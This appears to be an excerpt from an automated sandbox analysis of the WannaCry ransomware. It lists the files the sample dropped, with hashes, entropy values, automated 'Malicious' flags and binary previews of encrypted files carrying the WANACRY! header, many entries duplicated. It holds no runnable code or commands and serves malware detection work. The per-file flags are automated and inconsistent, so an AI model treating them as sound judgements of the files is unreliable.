                                                                              Preview:WANACRY!....."Dc..$...g/&...Bf.....Qq\F...('{l.$FmW......Jho...m...?.:.%BO...E.aN.TQ...S.Z...+7.(J)...;.r.....b.y.7.|...`.,Q.<@3.{t....l.Fh.....2M.]nx..#.f.P.../.b..5y.....ld.jK..).4...9.......8...k.......&...~.x.07.Fg.....I.#...V..Yi.i..1.K.p.#.. ...>:.%.............C..e6.J..*...Q2ci...>.~.....C.{.D!..G...?$........M...5..w...|gt_%..Nt..pm..w.......s.f.....xC=..G....L&.....f.A............8.>.N._#.,6..W..X.......;.(.......7*W..`.v\[.|i......s1,m.\.........r..5..d..6~]......c..>;-X7..XR$/.?....?h.@..Q*.8r.qT......x....b...^.W./..W.G.).........fo.9..8=....*B......%..\,...5......+....a..Iy..pb.J..U8...7B.d...iT8t.*t..fX..Rl.WU...`.....-z:..f.?67nmS.4..u...;...)....4......ki..n...+..c....U.IV.`k<...}&Qqg...........:..q...........,...t+.......W.!..........U....D.>A..nH..B.,..i......;...jy..2Y. :....6.q......:.S...T.ihM....},.pg...d.._...b.h%.(/.....{..Mb...Y0.....Y.D..u1x>.Qs...o..._...8.O...N.......".N...p}....2t..\....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.862409578093341
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkbsKiyPw2qzAKevdQMQdQF3C36b5iu6807yPaweLkPJ9ibrnerHi70XimwuHn:bkbsKwUKeVzQdQFdvTP0YPHibrYH1igH
                                                                              MD5:59C62286BCC7333393C9BED40CAA4304
                                                                              SHA1:99BFFE8A4FBAE6C4E478DFB6A864BB3F68928D69
                                                                              SHA-256:DF406EF00E741C4AF9E043ED3F2DBEAF597FC736B24CE95DE090978AC6D50F66
                                                                              SHA-512:142CF219B27F7FA472D1D8A9266B363DAD1764A529B0347E18F90FDEB470384ADA602E8400B3276CB86884A8BE99CCAD2B1AC16FA341FD4CDDF901F406398AF3
                                                                              Malicious:false
                                                                              Preview:WANACRY!....^".F}.T..J.C..3..x.P..E.5h.OZ....-.c..2.Q.n.....\.".k..5l.0...t.G...@...`D.F..X}Yh..,..bI[..P.5eSa.^@bi[$. .$>.ml..,)D[..9..O.6...9.hwpw.....!b......v.^..C.....B.(.:...Z.4.[....L\.....F...C....,.V.fy.X..* ..}...;...66.@.j.......4..+.M.)..8U].....................!W......g~.;u.W0.Z^.@..G/t.....i..n...@..$..$..p<sX.....[.q.N.....v].w.@o'.JP*!...U..V+...8:....7...Q.A^..BZ.wy...>.8..J.R&.q.eB..4.mOU......`i...%B...x7.....3...%{Z"{..o....<.>.B..x."...&L.Z.....Q.YHvG..<........{..+..q.w..a#..y....#.Q7.2.....]oh......g2~...j.h.m....1HA:.V.e.+..K.6.p.o{@.....a.HR.^..E...i.p.3.....;G."....1..=.M*[..$9.<.....W.+...i._...I.i........U..U.+9..".7a....8].X........_..L<-.....&.....m...$.v.....5.^{/V..m.].........e.c.\....b...../..S.&.@..0-2....{8..l.`._...!.....|..X>=.j....L......P..N3...O%&?i..L.09./..N..T.26C#S......_n...q.Q$^...iW.>...M.......Y.fg1....}.k...b.".F....u..D>M)....wB.]t..`...i...H'........a.n$...].-J=...@.......u..]..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.862409578093341
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkbsKiyPw2qzAKevdQMQdQF3C36b5iu6807yPaweLkPJ9ibrnerHi70XimwuHn:bkbsKwUKeVzQdQFdvTP0YPHibrYH1igH
                                                                              MD5:59C62286BCC7333393C9BED40CAA4304
                                                                              SHA1:99BFFE8A4FBAE6C4E478DFB6A864BB3F68928D69
                                                                              SHA-256:DF406EF00E741C4AF9E043ED3F2DBEAF597FC736B24CE95DE090978AC6D50F66
                                                                              SHA-512:142CF219B27F7FA472D1D8A9266B363DAD1764A529B0347E18F90FDEB470384ADA602E8400B3276CB86884A8BE99CCAD2B1AC16FA341FD4CDDF901F406398AF3
                                                                              Malicious:false
                                                                              Preview:WANACRY!....^".F}.T..J.C..3..x.P..E.5h.OZ....-.c..2.Q.n.....\.".k..5l.0...t.G...@...`D.F..X}Yh..,..bI[..P.5eSa.^@bi[$. .$>.ml..,)D[..9..O.6...9.hwpw.....!b......v.^..C.....B.(.:...Z.4.[....L\.....F...C....,.V.fy.X..* ..}...;...66.@.j.......4..+.M.)..8U].....................!W......g~.;u.W0.Z^.@..G/t.....i..n...@..$..$..p<sX.....[.q.N.....v].w.@o'.JP*!...U..V+...8:....7...Q.A^..BZ.wy...>.8..J.R&.q.eB..4.mOU......`i...%B...x7.....3...%{Z"{..o....<.>.B..x."...&L.Z.....Q.YHvG..<........{..+..q.w..a#..y....#.Q7.2.....]oh......g2~...j.h.m....1HA:.V.e.+..K.6.p.o{@.....a.HR.^..E...i.p.3.....;G."....1..=.M*[..$9.<.....W.+...i._...I.i........U..U.+9..".7a....8].X........_..L<-.....&.....m...$.v.....5.^{/V..m.].........e.c.\....b...../..S.&.@..0-2....{8..l.`._...!.....|..X>=.j....L......P..N3...O%&?i..L.09./..N..T.26C#S......_n...q.Q$^...iW.>...M.......Y.fg1....}.k...b.".F....u..D>M)....wB.]t..`...i...H'........a.n$...].-J=...@.......u..]..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.859823407268085
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkw92lDiwbiCxrCWPtd9JNiqwEsffByGA5f5myAN/Wgk9a:bk3kwOCxr/7LwdoGAFkNVT
                                                                              MD5:FB444C5F869C75810091FE1BB4B666D7
                                                                              SHA1:74D2DE014A6864893369C42DCF5C8A5DF31B2693
                                                                              SHA-256:F77DAE0AF6966C8F9445DD76F8ADC34FD8B70EA660F05CA9730DB459A8EA4E52
                                                                              SHA-512:901755E57773B429D43A9AAA526EC144E9EC698622E2601F5B22516760D1221FF7BE5BB42D4A6FA016EA8E70F741CB79F6AFB014E03F0AF6C1D4F5665C04DD2C
                                                                              Malicious:false
                                                                              Preview:WANACRY!..........@.&....I.M.D..n..%@~O.M$.><rJI./.X...*I.M.......z....E...m...q#...2|!sb...iq.........V3uTf..$......]o...w...g....s.n.....A..]...Iq.E.V}.....h.;c.S....!~..a5.#.....|....N........%..#.D..M.*F......O.~<...A.Z..1..l.N.....o@3.<.{.......}.t..&.................K..w..x.5...../"*.h..2x.~.1O4.....fz......W.K2u.V..RL.. ...58.Wz...A}.L'.thG7...~.l.$....p.S....g.Z.#.:s....._%.{.6.z=..U.+..."IFAP..5.}I..........8...p8....8.|.H...1.....!.)....~\.QSx.N..\..QFW....f....tY..|...2..b.&1...FM.l. ..h.N.O.;.w..|......#...".H!..O,...q......8.na...Q....^..{..P.[..T.n.. .r..ku/.....\o.....L......P.N.h..5.....K.H.x.._G.gqHn.&1..Ql..........w..."!L..M)...J....q.T=...Q.L....1.i...L.......If.`2<@.O.77...8.H+C*.o,..>..p..G..M%w.<).y....bB.. ..T........T...J.?..fJq...!..#Y...noNC....U.v.E..Z.o.p...Z..w...Y...U...F4.../....i.....n8M...N......5.O.).O.../ux.X....B.H...{..Ha@\63I ...)=....vt.....#.R7.[..D....Z{.x.J.0et.m_.....SF.r........&..[...G....I.T.^
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.859823407268085
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkw92lDiwbiCxrCWPtd9JNiqwEsffByGA5f5myAN/Wgk9a:bk3kwOCxr/7LwdoGAFkNVT
                                                                              MD5:FB444C5F869C75810091FE1BB4B666D7
                                                                              SHA1:74D2DE014A6864893369C42DCF5C8A5DF31B2693
                                                                              SHA-256:F77DAE0AF6966C8F9445DD76F8ADC34FD8B70EA660F05CA9730DB459A8EA4E52
                                                                              SHA-512:901755E57773B429D43A9AAA526EC144E9EC698622E2601F5B22516760D1221FF7BE5BB42D4A6FA016EA8E70F741CB79F6AFB014E03F0AF6C1D4F5665C04DD2C
                                                                              Malicious:false
                                                                              Preview:WANACRY!..........@.&....I.M.D..n..%@~O.M$.><rJI./.X...*I.M.......z....E...m...q#...2|!sb...iq.........V3uTf..$......]o...w...g....s.n.....A..]...Iq.E.V}.....h.;c.S....!~..a5.#.....|....N........%..#.D..M.*F......O.~<...A.Z..1..l.N.....o@3.<.{.......}.t..&.................K..w..x.5...../"*.h..2x.~.1O4.....fz......W.K2u.V..RL.. ...58.Wz...A}.L'.thG7...~.l.$....p.S....g.Z.#.:s....._%.{.6.z=..U.+..."IFAP..5.}I..........8...p8....8.|.H...1.....!.)....~\.QSx.N..\..QFW....f....tY..|...2..b.&1...FM.l. ..h.N.O.;.w..|......#...".H!..O,...q......8.na...Q....^..{..P.[..T.n.. .r..ku/.....\o.....L......P.N.h..5.....K.H.x.._G.gqHn.&1..Ql..........w..."!L..M)...J....q.T=...Q.L....1.i...L.......If.`2<@.O.77...8.H+C*.o,..>..p..G..M%w.<).y....bB.. ..T........T...J.?..fJq...!..#Y...noNC....U.v.E..Z.o.p...Z..w...Y...U...F4.../....i.....n8M...N......5.O.).O.../ux.X....B.H...{..Ha@\63I ...)=....vt.....#.R7.[..D....Z{.x.J.0et.m_.....SF.r........&..[...G....I.T.^
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.855081590415424
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkxTvTHqYwE55BALug6P93XcUBxUPU9l9fLwzz1Xu7OmclpXlh8l3Fi9QMJsTCMH:bkxTvjqYrSLug6VnVxLlJEzZXuylPXkh
                                                                              MD5:2DE628E1AF9D4E6E77C3C0CEA4F4535C
                                                                              SHA1:1B36F2B5C37821E4BCFB02529788C393D5A659F2
                                                                              SHA-256:FFD4BC72E993294B48A5151EEAAC0878987BDA9088A699621555ECA21145458E
                                                                              SHA-512:80F5CF4C6C60F334B39424B7B1E8A0F1115A906B3492C4ADBBB97045D532B57C7FEB97C335D0C53124588ECCE7823CF89242A14CD68700B603F07917B745CD0E
                                                                              Malicious:false
                                                                              Preview:WANACRY!........._.D.."=.3.|=.(.33...{xQN......B{.x|v6..Xu..n....R|7..G?........0.K..z.)Y..C9B?O....l.^..U.\....2...P....x.....l{.)..h.V.c.....E.p._y....O...c..5..F...*.P.W..Py...-|..bl..|...[..V..|.k..$..6.....6..8`Y...:.n....G.4.L.\....1.[.=."....!. ..l............@/."....F...p....#+.p.!.7b1 ......c..nf%e...&ss..2..>!.17.j.yz..9sV.......v4....eH.EL1bO...?.xJ.F.....z.....C...........6...7.J.....././.31.1..Q..o`.{&.S.....4.3,s.............BE..q..c.vGG.`..t.Uy...].....6..-.!A....c....:.J32.+;.AZbL.....,(..N.uY.]oT..........@..s..9.#'o.t...y.gY....e.m.u.$...<.).g..yYZ...%...h..x.T.......Zi:2.W...v....#k.....{..L.u...m...m7./w.E*w.k..GK.../.:.=.......d.$........<5.:...[-$.......n.....f.k. #._..G.g..X/.........,.Z...Zm...#..ymD.E........3..oSj.b.\..i.%...)..k...}...W.~"O.a[.&.sF.h.;.u....{-.I}..X>X.c.8..8|....].f..s.q...........ab.$..=.~.".+..q._.3...s7.jlN...o+...A.^...>$...bs........if@.................3y)_i..N.<.5...*Q..8..|.I...GR.~Bb(...Z.'.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.855081590415424
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkxTvTHqYwE55BALug6P93XcUBxUPU9l9fLwzz1Xu7OmclpXlh8l3Fi9QMJsTCMH:bkxTvjqYrSLug6VnVxLlJEzZXuylPXkh
                                                                              MD5:2DE628E1AF9D4E6E77C3C0CEA4F4535C
                                                                              SHA1:1B36F2B5C37821E4BCFB02529788C393D5A659F2
                                                                              SHA-256:FFD4BC72E993294B48A5151EEAAC0878987BDA9088A699621555ECA21145458E
                                                                              SHA-512:80F5CF4C6C60F334B39424B7B1E8A0F1115A906B3492C4ADBBB97045D532B57C7FEB97C335D0C53124588ECCE7823CF89242A14CD68700B603F07917B745CD0E
                                                                              Malicious:false
                                                                              Preview:WANACRY!........._.D.."=.3.|=.(.33...{xQN......B{.x|v6..Xu..n....R|7..G?........0.K..z.)Y..C9B?O....l.^..U.\....2...P....x.....l{.)..h.V.c.....E.p._y....O...c..5..F...*.P.W..Py...-|..bl..|...[..V..|.k..$..6.....6..8`Y...:.n....G.4.L.\....1.[.=."....!. ..l............@/."....F...p....#+.p.!.7b1 ......c..nf%e...&ss..2..>!.17.j.yz..9sV.......v4....eH.EL1bO...?.xJ.F.....z.....C...........6...7.J.....././.31.1..Q..o`.{&.S.....4.3,s.............BE..q..c.vGG.`..t.Uy...].....6..-.!A....c....:.J32.+;.AZbL.....,(..N.uY.]oT..........@..s..9.#'o.t...y.gY....e.m.u.$...<.).g..yYZ...%...h..x.T.......Zi:2.W...v....#k.....{..L.u...m...m7./w.E*w.k..GK.../.:.=.......d.$........<5.:...[-$.......n.....f.k. #._..G.g..X/.........,.Z...Zm...#..ymD.E........3..oSj.b.\..i.%...)..k...}...W.~"O.a[.&.sF.h.;.u....{-.I}..X>X.c.8..8|....].f..s.q...........ab.$..=.~.".+..q._.3...s7.jlN...o+...A.^...>$...bs........if@.................3y)_i..N.<.5...*Q..8..|.I...GR.~Bb(...Z.'.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):21400
                                                                              Entropy (8bit):7.989865120642674
                                                                              Encrypted:false
                                                                              SSDEEP:384:KSI/qXYZ+IcJUoXsEN8oHILwdD3iFf6uSPMLbO2j7JVBt:+CXZ9JUoX1wEIFfNSPV2j3
                                                                              MD5:869060E4519F258F41F2A36360364AE7
                                                                              SHA1:5AD2DA214325BB63AB5E6A4124AA8A6BFE627464
                                                                              SHA-256:9465752450837D37180A602144E2E2F53F23885718133A49195EB1E74305F780
                                                                              SHA-512:2083E66E09E71505BB2992FF27A8010DF773CDCF4546C85D294DD6B3466B55566D33AD2C5DCE8715D126AA00B397547002F4D231DAD06D84BE5DEB3EEF74AA61
                                                                              Malicious:false
                                                                              Preview:WANACRY!......Bd.v.K..l.....m....d...=..*)F.T.........Y...N...............G...0.........-.&..@.L....y...j..e.....v6.........@*F.e#.}..C(..K.&....-h}.[......r..#_mK&.f.~.i.......>.L...(......G...ZB.....0......d...7D)e<L..Y)|.G...x...Ya..p#.!j...S!H.......sR..........!.*........ LX.a..X.X...y.......mZD..+:..o..a..,qn......f...@i..l.=.CC....|.L..4K....Z...b.W...-.D.8..... .=|W.6.r.Qt..M...U...8?.}...p..Xs..*^.(+..D.!.. wb.:..j..k...F....+....Aa.[R..k#....j........YC?.'P.4p..,......#...%..j....d){&-.....%...+...d...U..,.^eF.lW.z.m.,..$f..1.=.....w.Q...4.......o.X..Z...6..#..u~..%.]....b..E......Z.x...m.6Qxtu..A..s.^....x..O.e...T...g..6!.<.]..#r....VL.1...4u8....,..3...yrW..z..z.I.5.......>o.j.|k.z../.SJ./.!*MbJ.5.L.&....a..U..+E74.......&.S......>.pi.|.>I..0.{f....).......^... a...-...~...2CB.p!.&.@.Wx.(.1.h....a.9?..j3....T;.L.G+../Y.;......`..7....v.<|m..S......... M..z......q.%.-bOm.....[..^@...........R..Z{...........
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):21400
                                                                              Entropy (8bit):7.989865120642674
                                                                              Encrypted:false
                                                                              SSDEEP:384:KSI/qXYZ+IcJUoXsEN8oHILwdD3iFf6uSPMLbO2j7JVBt:+CXZ9JUoX1wEIFfNSPV2j3
                                                                              MD5:869060E4519F258F41F2A36360364AE7
                                                                              SHA1:5AD2DA214325BB63AB5E6A4124AA8A6BFE627464
                                                                              SHA-256:9465752450837D37180A602144E2E2F53F23885718133A49195EB1E74305F780
                                                                              SHA-512:2083E66E09E71505BB2992FF27A8010DF773CDCF4546C85D294DD6B3466B55566D33AD2C5DCE8715D126AA00B397547002F4D231DAD06D84BE5DEB3EEF74AA61
                                                                              Malicious:false
                                                                              Preview:WANACRY!......Bd.v.K..l.....m....d...=..*)F.T.........Y...N...............G...0.........-.&..@.L....y...j..e.....v6.........@*F.e#.}..C(..K.&....-h}.[......r..#_mK&.f.~.i.......>.L...(......G...ZB.....0......d...7D)e<L..Y)|.G...x...Ya..p#.!j...S!H.......sR..........!.*........ LX.a..X.X...y.......mZD..+:..o..a..,qn......f...@i..l.=.CC....|.L..4K....Z...b.W...-.D.8..... .=|W.6.r.Qt..M...U...8?.}...p..Xs..*^.(+..D.!.. wb.:..j..k...F....+....Aa.[R..k#....j........YC?.'P.4p..,......#...%..j....d){&-.....%...+...d...U..,.^eF.lW.z.m.,..$f..1.=.....w.Q...4.......o.X..Z...6..#..u~..%.]....b..E......Z.x...m.6Qxtu..A..s.^....x..O.e...T...g..6!.<.]..#r....VL.1...4u8....,..3...yrW..z..z.I.5.......>o.j.|k.z../.SJ./.!*MbJ.5.L.&....a..U..+E74.......&.S......>.pi.|.>I..0.{f....).......^... a...-...~...2CB.p!.&.@.Wx.(.1.h....a.9?..j3....T;.L.G+../Y.;......`..7....v.<|m..S......... M..z......q.%.-bOm.....[..^@...........R..Z{...........
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):440
                                                                              Entropy (8bit):7.4934665387009876
                                                                              Encrypted:false
                                                                              SSDEEP:12:bkEET4iiAkAO+Y7QiqsHj7741QOEyuHib/Ug0ud16Jv:bkH00kTtEkGQOE7lg0v
                                                                              MD5:6BA21D3D24B23303FE0AD7E715FBAAF7
                                                                              SHA1:EE17BFAB8285B67BCD1A7C10A1A54A34490E1A99
                                                                              SHA-256:A7F08113848C6AB95A5B9031A13E151C1E7B836BDB85C85F90DE84FE953894AE
                                                                              SHA-512:D3A69884F038D6344D8D9F7AB5DF8C1C900046B8E69D54608D4A60B4548211550A044472226704A9BE5C3B2BD7CC55BA1210C39B5F05A3C8F3D271D179C07048
                                                                              Malicious:false
                                                                              Preview:WANACRY!....V..'.2.*w.".1.u.Fz.9..r..=.o\%.eq.be...1d.!.s.^.eb.t..uRw..R..XO..;M.=_Y_.......5....x.......k`....M^.%..S.R})..5}...F].g.]...Q..R$..6@.#g..w.. >.......T.<.......:.....7/.y._.&......*8D...\(.u2W.........&c...A.k+..)<...$.\..9x.._.w.x...(...V.............9fB.....#r-7u...m.P.w..U...).B...1R .E......m6.3..Q#../.......E....2..i...G...{.....0.GI..Z[\..1a.*7.&,.H..."...B.r....j...}.,V..Gz....!......P.V..o..A.....J
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):440
                                                                              Entropy (8bit):7.4934665387009876
                                                                              Encrypted:false
                                                                              SSDEEP:12:bkEET4iiAkAO+Y7QiqsHj7741QOEyuHib/Ug0ud16Jv:bkH00kTtEkGQOE7lg0v
                                                                              MD5:6BA21D3D24B23303FE0AD7E715FBAAF7
                                                                              SHA1:EE17BFAB8285B67BCD1A7C10A1A54A34490E1A99
                                                                              SHA-256:A7F08113848C6AB95A5B9031A13E151C1E7B836BDB85C85F90DE84FE953894AE
                                                                              SHA-512:D3A69884F038D6344D8D9F7AB5DF8C1C900046B8E69D54608D4A60B4548211550A044472226704A9BE5C3B2BD7CC55BA1210C39B5F05A3C8F3D271D179C07048
                                                                              Malicious:false
                                                                              Preview:WANACRY!....V..'.2.*w.".1.u.Fz.9..r..=.o\%.eq.be...1d.!.s.^.eb.t..uRw..R..XO..;M.=_Y_.......5....x.......k`....M^.%..S.R})..5}...F].g.]...Q..R$..6@.#g..w.. >.......T.<.......:.....7/.y._.&......*8D...\(.u2W.........&c...A.k+..)<...$.\..9x.._.w.x...(...V.............9fB.....#r-7u...m.P.w..U...).B...1R .E......m6.3..Q#../.......E....2..i...G...{.....0.GI..Z[\..1a.*7.&,.H..."...B.r....j...}.,V..Gz....!......P.V..o..A.....J
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):824
                                                                              Entropy (8bit):7.710614498709748
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk8lwt2Al4Q6LdVcXpXbnuSJYDE9e7kP9B:bkSxUULVSGE99
                                                                              MD5:FE89A1D5D37B14D351CC5975BE518884
                                                                              SHA1:F2D6458B6667D5CED134D5F793569BD8DA6F345B
                                                                              SHA-256:F14B3CD145CE6480EF11C302E432D6B04BED4927270946369C2D8F8374A2F2F0
                                                                              SHA-512:1D76881C4B12E6B433475D05622A88F4488B27309B59383974C77BFF1E289E7A3FC079867E38CFB26FBB600102ADA5C0CE4752D4BFBE45B098210AA5D010F8F1
                                                                              Malicious:false
                                                                              Preview:WANACRY!....ki.O.....).jZE..y^T..Z..8....%..>.$.u.{.;A..YJ...}@.8..&...h...wIs...*..Z...&..g.q.p...l..C...[zh.K...y.Y..|/Hv(.=...#.....k_}.)\.I..........rH.._.?.^.\P...G.)W.(.p`.M...a.....:..d.....[%...F...!8.gnR..Y.7............:...j..O..r..v-..~................@.e .G..^..>..].D..b.O",.H.<29,."{..&M...-.&C~,....'|.th...R....1p4.l.O..]..Co"....eFo..$$.~..`..z.&..#..IV.<,..!E.`0lL.....|.(..Y1C........$.!,..mz.7.8r fH.........mc...;.: B........9.h.Y..#...4R...J..C..: &6..#.#k.N......Q../..z.4...._)......,..t.$....M.....>n.....6.EC......EQ..#......?......~..:!D.dD#.tR.od...Efd.*.Ov......|F.y.>......Q.*. ....E.#.b.w.w....zu6...Pd.lN,V.j..h9.......1.ScB...`...C...\..!....y.[.c........4.!F..a......Q ../o.1...#l.\s. :W.....o..].p..;j.J.-.Q....}../.R..........)DZ.>...!..k.Z
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):824
                                                                              Entropy (8bit):7.710614498709748
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk8lwt2Al4Q6LdVcXpXbnuSJYDE9e7kP9B:bkSxUULVSGE99
                                                                              MD5:FE89A1D5D37B14D351CC5975BE518884
                                                                              SHA1:F2D6458B6667D5CED134D5F793569BD8DA6F345B
                                                                              SHA-256:F14B3CD145CE6480EF11C302E432D6B04BED4927270946369C2D8F8374A2F2F0
                                                                              SHA-512:1D76881C4B12E6B433475D05622A88F4488B27309B59383974C77BFF1E289E7A3FC079867E38CFB26FBB600102ADA5C0CE4752D4BFBE45B098210AA5D010F8F1
                                                                              Malicious:false
                                                                              Preview:WANACRY!....ki.O.....).jZE..y^T..Z..8....%..>.$.u.{.;A..YJ...}@.8..&...h...wIs...*..Z...&..g.q.p...l..C...[zh.K...y.Y..|/Hv(.=...#.....k_}.)\.I..........rH.._.?.^.\P...G.)W.(.p`.M...a.....:..d.....[%...F...!8.gnR..Y.7............:...j..O..r..v-..~................@.e .G..^..>..].D..b.O",.H.<29,."{..&M...-.&C~,....'|.th...R....1p4.l.O..]..Co"....eFo..$$.~..`..z.&..#..IV.<,..!E.`0lL.....|.(..Y1C........$.!,..mz.7.8r fH.........mc...;.: B........9.h.Y..#...4R...J..C..: &6..#.#k.N......Q../..z.4...._)......,..t.$....M.....>n.....6.EC......EQ..#......?......~..:!D.dD#.tR.od...Efd.*.Ov......|F.y.>......Q.*. ....E.#.b.w.w....zu6...Pd.lN,V.j..h9.......1.ScB...`...C...\..!....y.[.c........4.!F..a......Q ../o.1...#l.\s. :W.....o..].p..;j.J.-.Q....}../.R..........)DZ.>...!..k.Z
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):229656
                                                                              Entropy (8bit):7.999253382457518
                                                                              Encrypted:true
                                                                              SSDEEP:6144:M+IxWh2eTz8z2omIpR3yj+Dk1/Ev8F3yCx49jYywxt:ZIx42evYLpsj+Dk1sUF349sD
                                                                              MD5:BD3D4EFBD23907D4F2A9EE1DCF9AE570
                                                                              SHA1:FE30BF5559005FF81901FA844E3FFF3A9F5ED914
                                                                              SHA-256:D8B959F2C9F4679BCAB1F828C9C3F51B84A829F9D23B423D63D47593C12A795D
                                                                              SHA-512:D94210F0494328FDDC47972F567DE34924FABB258D5E2F6E53EA504CA7F494AF16C13B77907916F0807E905837D709F813A7EC127912291348334D2D9F277165
                                                                              Malicious:true
                                                                              Preview:WANACRY!..../.........d.^N....g.?.=.....>^h.I..m...\..V2.-..Q.l..a......Vv......-.Y>.Z...?.was.(.......o.....".t..z.e....87.n.......w....#\.C..yd....8..en9e..._Q...zz...c.I..Fh'i.~i.#.'..[?8......'I=6].....RPa~A.}v.+.l.....Lc..2..W.^..z.C.Q....c.Q.b...QL.../..............=..j].g....=..k.P(.W.4...lY0*/Oo.......[=.9.....w..>.F.S.z..i....X..R-...d..U...{.H..U.....~.q~...!(.....W:S%.D2.R...+.0.,E.Dd...^...@.f../....w.<.&_..{....%z.......J.|(.,..S..o'...MI..... ..]..V.$?..)..0.|.....I E31.'.pevi....|..yU6...V..S.b8.Q`.$l...>..o[f.?.....H.....(....^.d...4D.O...S.%U..o.ly6q.....?[....5.d.~...C........X.< !U..y.f/..xl..u...,~.......{..Va9s2..MR...A..E.#...{z...X........$z.1.......1x..0......F.~..Rc+..Q..h..Em<.O.\.s.....zqg!..J.#....d2S..`4/j.g2Xzik...Yd]s1y...IG..V.L.D..O.B..P...^.]0.,g....yv`m[I.k&[%M.8..?4....^..??k...v:.....c..P...1....h:e.....N..`.v......>T.:....x.K.P..._.,..DL1&.`.T.t.....+.L'..6.D.^..2..C[..........(..p6C.e_E`O!`........sC...Y.R
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):229656
                                                                              Entropy (8bit):7.999253382457518
                                                                              Encrypted:true
                                                                              SSDEEP:6144:M+IxWh2eTz8z2omIpR3yj+Dk1/Ev8F3yCx49jYywxt:ZIx42evYLpsj+Dk1sUF349sD
                                                                              MD5:BD3D4EFBD23907D4F2A9EE1DCF9AE570
                                                                              SHA1:FE30BF5559005FF81901FA844E3FFF3A9F5ED914
                                                                              SHA-256:D8B959F2C9F4679BCAB1F828C9C3F51B84A829F9D23B423D63D47593C12A795D
                                                                              SHA-512:D94210F0494328FDDC47972F567DE34924FABB258D5E2F6E53EA504CA7F494AF16C13B77907916F0807E905837D709F813A7EC127912291348334D2D9F277165
                                                                              Malicious:true
                                                                              Preview:WANACRY!..../.........d.^N....g.?.=.....>^h.I..m...\..V2.-..Q.l..a......Vv......-.Y>.Z...?.was.(.......o.....".t..z.e....87.n.......w....#\.C..yd....8..en9e..._Q...zz...c.I..Fh'i.~i.#.'..[?8......'I=6].....RPa~A.}v.+.l.....Lc..2..W.^..z.C.Q....c.Q.b...QL.../..............=..j].g....=..k.P(.W.4...lY0*/Oo.......[=.9.....w..>.F.S.z..i....X..R-...d..U...{.H..U.....~.q~...!(.....W:S%.D2.R...+.0.,E.Dd...^...@.f../....w.<.&_..{....%z.......J.|(.,..S..o'...MI..... ..]..V.$?..)..0.|.....I E31.'.pevi....|..yU6...V..S.b8.Q`.$l...>..o[f.?.....H.....(....^.d...4D.O...S.%U..o.ly6q.....?[....5.d.~...C........X.< !U..y.f/..xl..u...,~.......{..Va9s2..MR...A..E.#...{z...X........$z.1.......1x..0......F.~..Rc+..Q..h..Em<.O.\.s.....zqg!..J.#....d2S..`4/j.g2Xzik...Yd]s1y...IG..V.L.D..O.B..P...^.]0.,g....yv`m[I.k&[%M.8..?4....^..??k...v:.....c..P...1....h:e.....N..`.v......>T.:....x.K.P..._.,..DL1&.`.T.t.....+.L'..6.D.^..2..C[..........(..p6C.e_E`O!`........sC...Y.R
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):295192
                                                                              Entropy (8bit):7.999344313310653
                                                                              Encrypted:true
                                                                              SSDEEP:6144:zOjrl6hsUjSU2dr7lZbTA+1BThFRYR7u4V+qi1orRq35c5UYvG8C5VEm6u7OyM:zOjr2s7UunlZn/1BTHGA31Qq3KSsDCvC
                                                                              MD5:50EE742FB3C8438C6BC0A9DB6F134BD6
                                                                              SHA1:9D87BE1746226A68ABECAAF62934AE46461E1627
                                                                              SHA-256:A68731C45297658BE93957FED94A5C5FADB51992A2003E496A8B4F9C83628773
                                                                              SHA-512:3828E5EC968C6304FCDC60E6A4C77309E789008E70779230EF8EE06A9FCC5E1AE98B09F53E19BBCCB6E7E4E79E1C4E0A11BE36D408CAB994ED3B8405383A4286
                                                                              Malicious:true
